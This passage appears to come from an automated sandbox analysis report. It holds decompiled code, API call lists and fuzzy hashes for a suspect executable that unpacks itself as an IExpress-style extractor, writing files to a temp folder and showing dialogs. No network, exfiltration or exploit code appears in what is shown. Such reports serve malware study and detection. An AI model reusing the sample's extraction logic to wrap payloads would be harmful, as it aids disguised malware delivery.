                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A443D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa49a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A41A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A41A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A41A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A41A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A41A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 286eee222e1204038522c0ce2b701d903b8dbd9530d39297e0f3e9da6ce42ddc
                                                                                                                                                                                                                                            • Instruction ID: 0942925c9b8101abf636a28c14bc9b8704dd377510cd5796c370344868ec1b1b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 286eee222e1204038522c0ce2b701d903b8dbd9530d39297e0f3e9da6ce42ddc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11C83D5011099FDB10EFA8EE08AAE77B8EFDA340F104264F512D7191DB35AE52CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A463C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A41781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				E00A4658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}
















APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A463EB
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-2312194364
• Opcode ID: cb1a1518b3b6119349608512b2819ded5ab726044a139efdd33db81c80e4228f
• Instruction ID: 6597690b3d41afff4e1a790cf2d2f7c91b72e67667e0843c617f27c6fd6c263f
• Opcode Fuzzy Hash: cb1a1518b3b6119349608512b2819ded5ab726044a139efdd33db81c80e4228f
• Instruction Fuzzy Hash: 0D210579A00218ABCB10DF65DC85FEB7378EBC6310F000269F585A3180CBB05D858F61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A447E0(intOrPtr* __ecx) {
    intOrPtr _t6;
    intOrPtr _t9;
    void* _t11;
    void* _t19;
    intOrPtr* _t22;
    void _t24;
    struct HWND__* _t25;
    struct HWND__* _t26;
    void* _t27;
    intOrPtr* _t28;
    intOrPtr* _t33;
    void* _t34;

    _t33 = __ecx;
    _t34 = LocalAlloc(0x40, 8);
    if(_t34 != 0) {
        _t22 = _t33;
        _t27 = _t22 + 1;
        do {
            _t6 =  *_t22;
            _t22 = _t22 + 1;
        } while (_t6 != 0);
        _t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
         *_t34 = _t24;
        if(_t24 != 0) {
            _t28 = _t33;
            _t19 = _t28 + 1;
            do {
                _t9 =  *_t28;
                _t28 = _t28 + 1;
            } while (_t9 != 0);
            E00A41680(_t24, _t28 - _t19 + 1, _t33);
            _t11 =  *0xa491e0; // 0x2ec8390
             *(_t34 + 4) = _t11;
             *0xa491e0 = _t34;
            return 1;
        }
        _t25 =  *0xa48584; // 0x0
        E00A444B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
        LocalFree(_t34);
        L2:
        return 0;
    }
    _t26 =  *0xa48584; // 0x0
    E00A444B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
    goto L2;
}















                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44876
                                                                                                                                                                                                                                            0x00a44831
                                                                                                                                                                                                                                            0x00a44841
                                                                                                                                                                                                                                            0x00a44847
                                                                                                                                                                                                                                            0x00a4480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4480b
                                                                                                                                                                                                                                            0x00a447f6
                                                                                                                                                                                                                                            0x00a44806
                                                                                                                                                                                                                                            0x00000000

APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A44E6F), ref: 00A447EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00A44823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A44847
  • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
  • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A44851
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 359063898-2312194364
• Opcode ID: 81ddfc6ad3934d8d52ceb97ab1c9f8e99d6d76915c1f65b1e82e097611bd0463
• Instruction ID: 330e0b080b4e795891aeb48ecf3d7712ca7bab366f527540904c68bede45c73b
• Opcode Fuzzy Hash: 81ddfc6ad3934d8d52ceb97ab1c9f8e99d6d76915c1f65b1e82e097611bd0463
• Instruction Fuzzy Hash: 2A11E57D6046416FEB54DFB8AC18F773B6AEBCA300F148519FA829B741DA369C078760
Uniqueness

Uniqueness Score: -1.00%

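C-Code - Quality: 100%
E00A43680(void* __ecx) {
    void* _v8;
    struct tagMSG _v36;
    int _t8;
    struct HWND__* _t16;

    _v8 = __ecx;   /* handle to wait on, passed in ecx */
    _t16 = 0;      /* set to 1 once a WM_QUIT message has been seen */
    while(1) {
        /* 0xffffffff = INFINITE timeout, 0x4ff = QS_ALLINPUT wake mask */
        _t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
        if(_t8 == 0) {
            /* WAIT_OBJECT_0: the handle was signaled */
            break;
        }
        /* last argument 1 = PM_REMOVE */
        if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
            continue;
        } else {
            do {
                /* 0x12 = WM_QUIT */
                if(_v36.message != 0x12) {
                    DispatchMessageA( &_v36);
                } else {
                    _t16 = 1;
                }
                _t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
            } while (_t8 != 0);
            if(_t16 == 0) {
                continue;
            }
        }
        break;
    }
    return _t8;
}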








APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A4369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436B2
• DispatchMessageA.USER32(?), ref: 00A436CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A436DA
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: d7327ba416a4b778e5ea3fa1c3d345505ba529deb9e12f2ba3feaac67ec61aaf
• Instruction ID: 8b07dc58f278de5be5418775bf7c751f6302811c354d5c92ba842658b38299e4
• Opcode Fuzzy Hash: d7327ba416a4b778e5ea3fa1c3d345505ba529deb9e12f2ba3feaac67ec61aaf
• Instruction Fuzzy Hash: B101A77B940255B7DF308BEA5C48EEBB67CEBC6B11F010219F915E2180D561C641CA60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A46517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa49a3c; // 0xa40000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0240d38390c349cd17f43e2edeb90968a9654760a31163063c5de4c94bddd342
                                                                                                                                                                                                                                            • Instruction ID: d543f359ecb57667d8038c28bcfe02260f113b5ba690f712bd5626594c11c5f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0240d38390c349cd17f43e2edeb90968a9654760a31163063c5de4c94bddd342
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5301267A140205BBDB109FA99C08EBB7A6CEBCB361F000225FE04A3150D7728C1186A3
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A465E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A42B33), ref: 00A46602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A46612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A46629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A46635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 84aee89f9d21a425674aba3859c9f825672066ed7b59e28a8f90edf824669578
                                                                                                                                                                                                                                            • Instruction ID: 0e0e172d40508efcffe1ec23b0ba4965e2d70f50c22f1d472970d193ee3e23b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84aee89f9d21a425674aba3859c9f825672066ed7b59e28a8f90edf824669578
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0283E0041906EE7365B6C8C888BBFF9CCFDB355B2A02AFE49182001D6160D478A63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A469B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa481f8 = E00A46C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A46FBE(2));
                                                                                                                                                                                                                                            				 *0xa488a4 =  *0xa488a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa488a8 =  *0xa488a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa48528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa4851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A47000();
                                                                                                                                                                                                                                            				if( *0xa48000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A47000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A471EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A46FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A46FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A469C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A469D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A469E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A46A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 0cfbcad1d288b7bd9dc51e61556adef6b7cd48621ba728baf5058a5705a33a7e
                                                                                                                                                                                                                                            • Instruction ID: 9512756e0cd4a0d83ddbff5a011eb2c0ded4048a53bb35ea61464aa9e8a5aec6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cfbcad1d288b7bd9dc51e61556adef6b7cd48621ba728baf5058a5705a33a7e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0587C1487018FC714EBB4BE0A20C3B60FBC3321B100A09E462862F0CFBF80429A02
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:960
                                                                                                                                                                                                                                            Total number of Limit Nodes:24
3267 3263c0 3268 326407 3267->3268 3269 32658a CharPrevA 3268->3269 3270 326415 CreateFileA 3269->3270 3271 32643a 3270->3271 3272 326448 WriteFile 3270->3272 3274 326ce0 4 API calls 3271->3274 3273 326465 CloseHandle 3272->3273 3273->3271 3276 32648f 3274->3276

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
C-Code - Quality: 82%
E00323BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x328004; // 0x2c4b51c8
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x329124 =  *0x329124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x328a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x328c42 != 0) {
				goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E0032468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
